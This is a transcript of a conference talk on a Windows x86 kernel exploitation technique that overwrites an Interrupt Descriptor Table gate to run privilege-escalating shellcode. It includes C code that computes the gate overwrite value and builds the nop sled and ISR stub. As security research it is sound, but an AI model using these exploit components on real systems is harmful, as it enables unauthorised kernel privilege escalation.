abusing interrupts for reliable windows kernel exploitation (en)
TRANSCRIPT
Abusing Interrupts for Reliable Windows Kernel Exploitation
2015/11/14
AVTOKYO2015
inaz2
About me
• inaz2
• Security engineer & Python programmer
• Working at NTT Communications
• Weblog “momoiro technology”
  • http://inaz2.hatenablog.com/
Windows kernel exploitation
• Attacks that exploit a vulnerability in kernel land
  • Including vulnerabilities in device drivers
• A write-what-where condition/vulnerability is widely used
  • Lets the attacker write an arbitrary value to an arbitrary address
• Execute shellcode to escalate the privilege of the attacking process
  • Then launch an administrator command prompt
Classic technique: halDispatchTable overwrite
• nt!NtQueryIntervalProfile (undocumented native API, reachable from user mode)
  • Calls [nt!halDispatchTable+4] via nt!KeQueryIntervalProfile
• Overwrite [nt!halDispatchTable+4] with the address of the shellcode, then call NtQueryIntervalProfile
Replace token shellcode
• Copy the token of the System process (PID=4) into the attacking process
• (Shellcode listing in the slide) Replace 41414141h with the attacking process’ PID
It works but …
• It depends on the implementation of nt!NtQueryIntervalProfile
  • The kernel implementation may change in the future (i.e. not reliable)
• Is there a more reliable target to overwrite?
x86 interrupt handling
• There are hardware interrupts (keyboard etc.) and software interrupts/exceptions (division by zero etc.)
  • Software interrupts can also be raised explicitly with the “int n” instruction
• Interrupt Descriptor Table (IDT)
  • Each entry (interrupt gate) stores the address of a handler function (Interrupt Service Routine; ISR)
• ISRs execute in Ring 0
  • They can do everything
x86 privilege levels (protection rings)
• 4 privilege levels numbered from 0 to 3
  • A greater number means fewer privileges
• Most OSes including Windows use only two rings
  • Ring 0 corresponds to kernel mode and Ring 3 to user mode
Interrupt Descriptor Table (1/4)
• Intel Developer’s Manual Volume 3, Chapter 6 (figure from the manual, not reproduced)
Interrupt Descriptor Table (2/4)
• Intel Developer’s Manual Volume 3, Chapter 6 (figure from the manual, not reproduced)
  • A gate can be invoked from Ring 3 with “int n” only if its DPL=3
Interrupt Descriptor Table (3/4)
• WinDbg (KD) view (figure: the IDT dumped in the kernel debugger)
Interrupt Descriptor Table (4/4)
• Overwrite the interrupt gate for interrupt #0
  • After the overwrite the gate reads 000884fc 4141ee00: selector 0008, handler offset 414184fc, type E (32-bit interrupt gate), present, DPL=3
IDT overwrite technique
1. Get the IDT address
2. Overwrite the interrupt gate for interrupt #n
3. Trigger interrupt #n with the “int n” instruction
4. Execute the shellcode
Detailed procedure
Find the write-what-where vulnerability
• Write and install a vulnerable device driver (for the demo)
  • Exposes a write-what-where primitive via IOCTL
Get the IDT address (1/2)
• The sidt instruction stores the IDTR (limit and base address of the IDT) to memory
  • Can be used even in Ring 3!
Get the IDT address (2/2)
• The function that returns the IDT address (code listing in the slide)
  • The IDTR structure it reads into must have alignment padding disabled (2-byte limit + 4-byte base = 6 bytes)
Write the Interrupt Software Routine (ISR)
• Switch the fs segment register: 0x3B (TEB) → 0x30 (KPCR)
  • An interrupt gate reloads only cs/ss, so ring-0 code entered this way still has the user-mode fs; the token shellcode reads the current thread through fs:[KPCR]
• Call the shellcode right after the ISR, then switch fs back to 0x3B
  • iretd to ring 3 would otherwise null the ring-0 data selector left in fs and the process would crash on its next TEB access
• Return with the iretd instruction instead of ret
Allocate memory & put the codes
• Allocate a nop sled from 0x41410000 to 0x41420000 (64 KiB, covering every value the original gate’s offset[15:0] may hold)
• Put the ISR code + shellcode at 0x41420000
Overwrite the interrupt gate
• Write 0x4141ee00 to the upper half of the interrupt gate for interrupt #32
  • Only the upper dword is written: offset[31:16] = 0x4141, P=1, DPL=3, type = 32-bit interrupt gate; the selector and offset[15:0] keep their original values, so the handler lands somewhere in the nop sled
  • Vectors 32-255 are user-defined interrupts (Intel reserves 0-31)
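The gate arithmetic behind slides 13, 18-19 and 22, as an added example written for this transcript (not code from the talk): a packed 32-bit IDTR (the "disable alignment" point), the gate address for a vector, decoding of the gate bytes shown on slide 13, and the dword that a partial overwrite has to contain so that the handler lands in the nop sled. The IDTR bytes in main are constructed; `read_idtr` is only compiled on x86 GCC/Clang and is there to show that sidt needs no privilege (a UMIP-enabled kernel hands back a dummy base). A little-endian host is assumed.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* IDTR as SIDT stores it on 32-bit x86: 16-bit limit, then 32-bit base.
 * Without packing the compiler pads this to 8 bytes and the base is read from
 * the wrong offset: the "disable alignment" note on slide 19. */
#pragma pack(push, 1)
typedef struct { uint16_t limit; uint32_t base; } idtr32_t;
#pragma pack(pop)

/* Fields of one 8-byte 32-bit interrupt gate (Intel SDM vol. 3, ch. 6). */
typedef struct {
    uint32_t offset;   /* linear address of the handler (ISR) */
    uint16_t selector; /* code segment; 0x0008 on Windows x86 (KGDT_R0_CODE) */
    uint8_t  type;     /* 0xE = 32-bit interrupt gate, 0xF = 32-bit trap gate */
    uint8_t  dpl;      /* "int n" from ring 3 raises #GP unless dpl == 3 */
    bool     present;
} gate32_t;

#if defined(__GNUC__) && (defined(__i386__) || defined(__x86_64__))
typedef struct { uint16_t limit; uint64_t base; } __attribute__((packed)) idtr_raw_t;
/* SIDT is unprivileged, so this works from ring 3 (slide 18). A 64-bit host
 * stores 10 bytes, a 32-bit host 6; kernels with UMIP hand back a dummy base. */
idtr_raw_t read_idtr(void) {
    idtr_raw_t r = { 0, 0 };
    __asm__ volatile ("sidt %0" : "=m" (r));
    return r;
}
#endif

/* Parse the 6 bytes SIDT stored (little-endian host assumed). */
idtr32_t parse_idtr32(const uint8_t raw[6]) {
    idtr32_t r;
    memcpy(&r, raw, sizeof r);
    return r;
}

/* Address of the gate for a vector, or 0 if the vector is beyond the limit. */
uint32_t gate_address(idtr32_t idtr, unsigned vector) {
    if (vector * 8u + 7u > idtr.limit) return 0;
    return idtr.base + vector * 8u;
}

/* Split a gate into fields; lo/hi are the two dwords as WinDbg "dd" prints them. */
gate32_t decode_gate(uint32_t lo, uint32_t hi) {
    gate32_t g;
    g.offset   = (hi & 0xFFFF0000u) | (lo & 0xFFFFu);
    g.selector = (uint16_t)(lo >> 16);
    g.type     = (uint8_t)((hi >> 8) & 0xFu);
    g.dpl      = (uint8_t)((hi >> 13) & 0x3u);
    g.present  = ((hi >> 15) & 1u) != 0;
    return g;
}

/* The dword written over the upper half of the gate: offset[31:16] from the
 * sled base, P=1, DPL=3 (callable from ring 3), S=0, type 0xE. For a sled at
 * 0x41410000 this is 0x4141ee00, the value on slide 22. */
uint32_t gate_overwrite_value(uint32_t sled_base) {
    const uint32_t PRESENT = 1u << 15, DPL3 = 3u << 13, INT_GATE_32 = 0xEu << 8;
    return (sled_base & 0xFFFF0000u) | PRESENT | DPL3 | INT_GATE_32;
}

/* Only the upper dword is written, so selector and offset[15:0] stay the
 * kernel's and the handler ends up at sled_base + original offset[15:0].
 * Returns that address if it lies inside the sled, else 0. */
uint32_t handler_after_overwrite(uint32_t orig_lo, uint32_t sled_base, uint32_t sled_len) {
    gate32_t g = decode_gate(orig_lo, gate_overwrite_value(sled_base));
    if (g.offset < sled_base || g.offset - sled_base >= sled_len) return 0;
    return g.offset;
}

int main(void) {
    /* Constructed IDTR bytes: limit 0x7ff (256 gates), base 0x80f84000. */
    const uint8_t raw[6] = { 0xff, 0x07, 0x00, 0x40, 0xf8, 0x80 };
    idtr32_t idtr = parse_idtr32(raw);
    gate32_t g = decode_gate(0x000884fcu, 0x4141ee00u);   /* slide 13 */
    printf("gate #32 lives at %08x\n", gate_address(idtr, 32));
    printf("handler %08x selector %04x type %x dpl %u present %d\n",
           g.offset, g.selector, (unsigned)g.type, (unsigned)g.dpl, (int)g.present);
    printf("dword to write for a sled at 41410000: %08x\n", gate_overwrite_value(0x41410000u));
    return 0;
}
```

`handler_after_overwrite` is the check to run before choosing the sled size: with a 64 KiB sled every possible original offset[15:0] is covered, while a smaller sled (say 32 KiB) leaves vectors whose original low offset is above the sled end pointing at unmapped memory.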
Trigger the software interrupt
• Execute “int 32”
  • The shellcode runs in Ring 0 via the ISR and replaces the token
• Then launch cmd.exe
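How the pieces of slides 20-23 fit together in memory, as an added example written for this transcript and not code from the talk: it hand-assembles the ISR stub (fs switch, call, fs restore, iretd), lays out the 64 KiB nop sled in front of it and patches the 41414141h PID marker the way slide 5 describes. The token-replacing shellcode is not reproduced; a constructed six-byte stand-in (`mov eax, 41414141h ; ret`) takes its place. The selectors 0x30 (KPCR) and 0x3B (TEB) are the standard Windows x86 GDT values and are assumed here.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Layout from slide 21: 64 KiB nop sled at 0x41410000, ISR stub + shellcode
 * at 0x41420000. */
#define SLED_BASE    0x41410000u
#define SLED_SIZE    0x10000u
#define ISR_BASE     (SLED_BASE + SLED_SIZE)
#define ISR_STUB_LEN 20u
#define PID_MARKER   0x41414141u   /* placeholder patched with the attacker's PID (slide 5) */

/* Assumed standard Windows x86 GDT selectors: fs = 0x3B (TEB) in user mode,
 * 0x30 (KPCR) in kernel mode. */
#define KGDT_R0_PCR  0x30u
#define KGDT_R3_TEB  0x3Bu

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hand-assembled 32-bit ISR stub (slide 20). An interrupt gate reloads only
 * cs/ss, so the stub runs in ring 0 with the user-mode fs still loaded: it
 * points fs at the KPCR, calls the shellcode, puts the TEB selector back and
 * returns with iretd, which pops the EIP/CS/EFLAGS/ESP/SS that "int n" pushed
 * ("int n" pushes no error code). eax is clobbered, which is harmless because
 * the only caller is the exploit's own "int 32". */
size_t emit_isr_stub(uint8_t *out, uint32_t stub_addr, uint32_t shellcode_addr) {
    size_t n = 0;
    out[n++] = 0xB8; put_le32(out + n, KGDT_R0_PCR); n += 4;    /* mov eax, 0x30  */
    out[n++] = 0x8E; out[n++] = 0xE0;                            /* mov fs, ax     */
    uint32_t rel = shellcode_addr - (stub_addr + (uint32_t)n + 5u);
    out[n++] = 0xE8; put_le32(out + n, rel); n += 4;             /* call shellcode */
    out[n++] = 0xB8; put_le32(out + n, KGDT_R3_TEB); n += 4;    /* mov eax, 0x3B  */
    out[n++] = 0x8E; out[n++] = 0xE0;                            /* mov fs, ax     */
    out[n++] = 0xCF;                                             /* iretd          */
    return n;  /* == ISR_STUB_LEN */
}

typedef struct {
    uint8_t *buf;           /* image to be placed at SLED_BASE */
    size_t   len;
    size_t   isr_off;       /* == SLED_SIZE */
    size_t   shellcode_off; /* == SLED_SIZE + ISR_STUB_LEN */
    bool     pid_patched;   /* PID_MARKER found and replaced */
} payload_t;

/* Build [nop sled][ISR stub][shellcode] and patch the PID marker. The caller
 * supplies the shellcode; it must end with "ret" so control returns to the stub. */
payload_t build_payload(const uint8_t *shellcode, size_t sc_len, uint32_t pid) {
    payload_t p;
    p.isr_off = SLED_SIZE;
    p.shellcode_off = SLED_SIZE + ISR_STUB_LEN;
    p.len = p.shellcode_off + sc_len;
    p.pid_patched = false;
    p.buf = malloc(p.len);
    if (!p.buf) { p.len = 0; return p; }
    memset(p.buf, 0x90, SLED_SIZE);                               /* nop sled */
    emit_isr_stub(p.buf + p.isr_off, ISR_BASE, ISR_BASE + ISR_STUB_LEN);
    memcpy(p.buf + p.shellcode_off, shellcode, sc_len);
    for (size_t i = 0; i + 4 <= sc_len; i++) {                    /* 41414141h -> PID */
        if (get_le32(p.buf + p.shellcode_off + i) == PID_MARKER) {
            put_le32(p.buf + p.shellcode_off + i, pid);
            p.pid_patched = true;
            break;
        }
    }
    return p;
}

/* Constructed stand-in for the token shellcode: "mov eax, 41414141h ; ret". */
static const uint8_t demo_shellcode[] = { 0xB8, 0x41, 0x41, 0x41, 0x41, 0xC3 };

payload_t demo_payload(uint32_t pid) {
    return build_payload(demo_shellcode, sizeof demo_shellcode, pid);
}

int main(void) {
    payload_t p = demo_payload(1234);
    printf("image %zu bytes, ISR at %08x, shellcode at %08x, pid patched: %d\n",
           p.len, ISR_BASE, ISR_BASE + ISR_STUB_LEN, (int)p.pid_patched);
    printf("call rel32 inside the stub: %u\n", get_le32(p.buf + p.isr_off + 8));
    free(p.buf);
    return 0;
}
```

The image is what the exploit maps at 0x41410000 before writing 0x4141ee00 over the gate; whatever offset[15:0] the original gate carried, execution slides through the nops into the stub, the stub's `call` reaches the shellcode at ISR_BASE + 20, and the shellcode's `ret` brings control back for the fs restore and `iretd`.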
Demo
What about 64-bit Windows?
• The size of an interrupt gate increases to 16 bytes (the handler offset is split into three fields, including offset[63:32])
• Since a 0x100000000-byte nop sled is not practical, the entire interrupt gate has to be overwritten (i.e. two writes)
• However, my VirtualBox VM hangs when the interrupt is triggered (PatchGuard??)
Comparison with halDispatchTable overwrite
• Pros
  • Reliable against all versions of x86-based Windows: the gate format is defined by the CPU, not by the kernel
  • Easy to determine the address to be overwritten (IDT base from sidt + 8 × vector)
• Cons
  • Need to prepare the ISR code
  • Need to allocate a nop sled
  • The ISR and shellcode live in user-mode pages, so the technique is stopped where SMEP is enforced
  • Not confirmed on 64-bit
Recap
• The IDT overwrite technique is reliable against all versions of x86-based Windows
  • Independent of kernel implementation changes
• The IDT address can be obtained even from Ring 3
• There’s more than one way to do it
References
• Windowsでデバイスドライバの脆弱性からの権限昇格をやってみる (Trying privilege escalation from a device driver vulnerability on Windows) - momoiro technology
  http://inaz2.hatenablog.com/entry/2015/09/15/121926
• Project Zero: One font vulnerability to rule them all #4: Windows 8.1 64-bit sandbox escape exploitation
  http://googleprojectzero.blogspot.jp/2015/08/one-font-vulnerability-to-rule-them-all_21.html
• Interrupt Service Routines - OSDev Wiki
  http://wiki.osdev.org/Interrupt_Service_Routines
• SIMPLE IS BETTER: Kernel Information Leak with Unprivileged Instructions (SIDT, SGDT) on x86 - WHY?
  http://hypervsir.blogspot.jp/2014/10/kernel-information-leak-with.html
Thank you! inaz2